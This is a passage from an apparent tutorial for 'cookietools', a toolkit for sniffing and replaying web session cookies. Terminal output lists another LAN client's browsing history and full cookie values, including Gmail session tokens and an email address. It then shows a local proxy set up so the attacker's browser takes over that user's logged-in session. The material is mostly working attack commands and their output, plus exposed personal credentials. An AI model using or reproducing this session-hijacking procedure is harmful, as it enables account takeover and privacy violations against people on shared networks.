1199190174.746013 Set-Cookie: GMAIL_LOGIN=1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: GMAIL_SU=1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
xenion@gollum:~/dev/cookietools-0.4$

You can also analyze the complete log directory with vision.sh:

xenion@gollum:~/dev/cookietools-0.4$ bin/analyzers/vision.sh logz/
======================== Client 192.168.1.2 ========================

----- Links -----
link[192.168.1.2] http://gmail.com/
link[192.168.1.2] http://mail.google.com/mail/
link[192.168.1.2] http://mail.google.com/mail/channel/test?at=xn3j2v99py493ewyy79lojwafijvez&MODE=init&zx=tq882kz7xgn1&it=2382
link[192.168.1.2] http://mail.google.com/mail/?ui=1&view=cbj&zx=5t98v1rwy7ch
link[192.168.1.2] http://mail.google.com/mail/?ui=1&ik=&search=inbox&view=tl&start=0&init=1&zx=9plajc7d6rg
link[192.168.1.2] http://chatenabled.mail.google.com/mail/images/cleardot.gif?at=xn3j2v99py493ewyy79lojwafijvez&rand=a70d6eca1f1199190169498
link[192.168.1.2] http://mail.google.com/mail/channel/test?at=xn3j2v99py493ewyy79lojwafijvez&at=xn3j2v99py493ewyy79lojwafijvez&TYPE=xmlhttp&zx=28vid2kb03y6&it=1014
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&VER=4&RID=13352&CVER=2&zx=kknfxdxr9o2a&it=3536
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&VER=2&SID=DD824965CD4E2C0E&RID=13353&zx=siwuxhht784h&it=4417
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&RID=rpc&SID=DD824965CD4E2C0E&CI=0&AID=3&TYPE=xmlhttp&zx=3dtklszb0p3c&it=4413
link[192.168.1.2] http://news.bbc.co.uk/go/rss/-/2/hi/africa/7166590.stm
link[192.168.1.2] http://news.bbc.co.uk/css/screen/nol/story.css?v2
link[192.168.1.2] http://news.bbc.co.uk/2/hi/africa/7166590.stm
link[192.168.1.2] http://news.bbc.co.uk/css/screen/shared/styles.css?v1
link[192.168.1.2] http://news.bbc.co.uk/css/screen/nol/styles.css?v2
link[192.168.1.2] http://news.bbc.co.uk/css/screen/nol/programmes.css?v3
link[192.168.1.2] http://news.bbc.co.uk/js/newsi/latest/newsi.js?5
link[192.168.1.2] http://newsimg.bbc.co.uk/nol/shared/js/nol4.js?v2
link[192.168.1.2] http://newsimg.bbc.co.uk/nol/shared/js/livestats_v1_1.js?v2
link[192.168.1.2] http://newsimg.bbc.co.uk/nol/ukfs_news/js/av.js?v2
link[192.168.1.2] http://switch.atdmt.com/action/agencyrep_bbc_usa_africa_home
link[192.168.1.2] http://stats.bbc.co.uk/o.gif?~RS~s~RS~News~RS~t~RS~HighWeb_Story~RS~i~RS~7166590~RS~p~RS~45373~RS~a~RS~International~RS~u~RS~/2/hi/africa/7166590.stm~RS~r~RS~(none)~RS~q~RS~~RS~z~RS~56~RS~
link[192.168.1.2] http://secure-uk.imrworldwide.com/cgi-bin/j?ci=bbc&rd=1199190181061&se=1&sv=
link[192.168.1.2] http://secure-uk.imrworldwide.com/cgi-bin/m?rnd=1199190186127&ci=bbc&cg=0&sr=1280x1024&cd=24&lg=en-US&je=y&ck=y&tz=1&ct=&hp=&tl=BBC%20NEWS%20%7C%20Africa%20%7C%20EU%20casts%20doubts%20over%20Kenyan%20poll&si=http%3A//news.bbc.co.uk/2/hi/africa/7166590.stm&rp=
link[192.168.1.2] http://news.bbc.co.uk/js/app/bbccom/zonefile.js?2

----- Cookies -----
hosts[192.168.1.2:] atdmt.com bbc.co.uk google.com imrworldwide.com 

names[192.168.1.2:atdmt.com] AA002 
value[192.168.1.2:atdmt.com] 'AA002'='1196618839-269882625/1197828564'

names[192.168.1.2:bbc.co.uk] BBC-UID BBCNewsAudience 
value[192.168.1.2:bbc.co.uk] 'BBC-UID'='0477b551c165dae0035b856e0080786dd2bc55bed080d1a4249f568f02b5b72f0Mozilla%2f5%2e0%20%28X11%3b%20U%3b%20Linux%20i686%3b%20en%2dUS%3b%20rv%3a1%2e8%2e1%2e8%29%20Gecko%2f20071004%20Iceweasel%2f2%2e0%2e0%2e8%20%28Debian%2d2%2e0%2e0%2e8%2d1%29'
value[192.168.1.2:bbc.co.uk] 'BBCNewsAudience'='International'

names[192.168.1.2:google.com] GBE GMAIL_LOGIN GMAIL_RTT GMAIL_STAT GMAIL_SU GX MPRF NID PREF S TZ __utma __utmb __utmc __utmx __utmz gmailchat rememberme 
value[192.168.1.2:google.com] 'GBE'='bf-i'
value[192.168.1.2:google.com] 'GMAIL_LOGIN'='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
value[192.168.1.2:google.com] 'GMAIL_RTT'='320'
value[192.168.1.2:google.com] 'GMAIL_STAT'='lt=426&js=170&dw=228&ct=0&tot=2029&fv=1&id=caed9113f5&v=tl&st=56&dbe=0&'
value[192.168.1.2:google.com] 'GMAIL_SU'='1'
value[192.168.1.2:google.com] 'GX'='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
value[192.168.1.2:google.com] 'MPRF'='H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA'
value[192.168.1.2:google.com] 'NID'='7=RRE4jr8XVEa4AFRURVCiMOgLhDXzPa_75YanatMTy0T5xYonLGU2q3Q4eMmrLh7LVWrDv4twqmRIjTD3WBqkO1rheLOyMvDMqMPgW0prTZ7sspRbz1465tJrxdFc7mY-'
value[192.168.1.2:google.com] 'PREF'='ID=812e53f4f3a1cd85:TM=1195121947:LM=1195121947:GM=1:S=9aWctJCGm9OIRqAG'
value[192.168.1.2:google.com] 'S'='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
value[192.168.1.2:google.com] 'TZ'='-60'
value[192.168.1.2:google.com] '__utma'='173272373.895254698.1196439681.1198340013.1199189248.10'
value[192.168.1.2:google.com] '__utmb'='173272373'
value[192.168.1.2:google.com] '__utmc'='173272373'
value[192.168.1.2:google.com] '__utmx'='173272373.'
value[192.168.1.2:google.com] '__utmz'='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
value[192.168.1.2:google.com] 'gmailchat'='charlieroot69@gmail.com/249934'
value[192.168.1.2:google.com] 'rememberme'='true'

names[192.168.1.2:imrworldwide.com] IMRID V5 
value[192.168.1.2:imrworldwide.com] 'IMRID'='R1LwvdTvKXQAACfLmHA'
value[192.168.1.2:imrworldwide.com] 'V5'='AStfMFg4PxkGNh8.ED4jIyoSBAIqI1InHlJBQQ??'

xenion@gollum:~/dev/cookietools-0.4$

Now we set the sniffed cookies in our web browser (impersonate web user with ip 192.168.1.2 using './logz/' as cookiesniffer logs directory):

xenion@gollum:~/dev/cookietools-0.4$ bin/cookieserver/startup.sh logz 192.168.1.2
checking for: socat sed grep egrep cut cat head sort tail uniq 
checking log directory...
Client: '192.168.1.2' Logdir: 'logz'
Cookie Server: 127.0.0.1:8181
tmp files will be generated at each request (slower but dynamic)
Listening...

You can optionally add a third parameter, the constant string 'static'. It will force cookieserver to generate static information, you should enable this option only when the information you are interested in is fixed and don't change. Now we start Firefox, setting the HTTP Proxy to 127.0.0.1:8181. Going to URL http://x where x can be anything, the resulting XHTML page is the same (generated by cookieserver). This is the XHTML page structure you should see:

CookieServer
Logdir: 'logz'
Client: '192.168.1.2'
Faking host: x
Cookie hosts (12):
    * google.com
    * ...
Links (21):
    * http://mail.google.com/mail/...
    * ...
Set-Cookies (16):
Set-Cookie: GMAIL_AT=...; path=/; domain=google.com;
Set-Cookie: ...
EOF

if you visit the URL http://google.com the Cookie GMAIL_AT (with others) will be set. Now, you can use the cookies you have set simply restoring the original proxy settings in your web browser.

Links

• Antifork: http://www.antifork.org
• xenion headquarter: http://xenion.antifork.org
• cookietools home: http://xenion.antifork.org/cookietools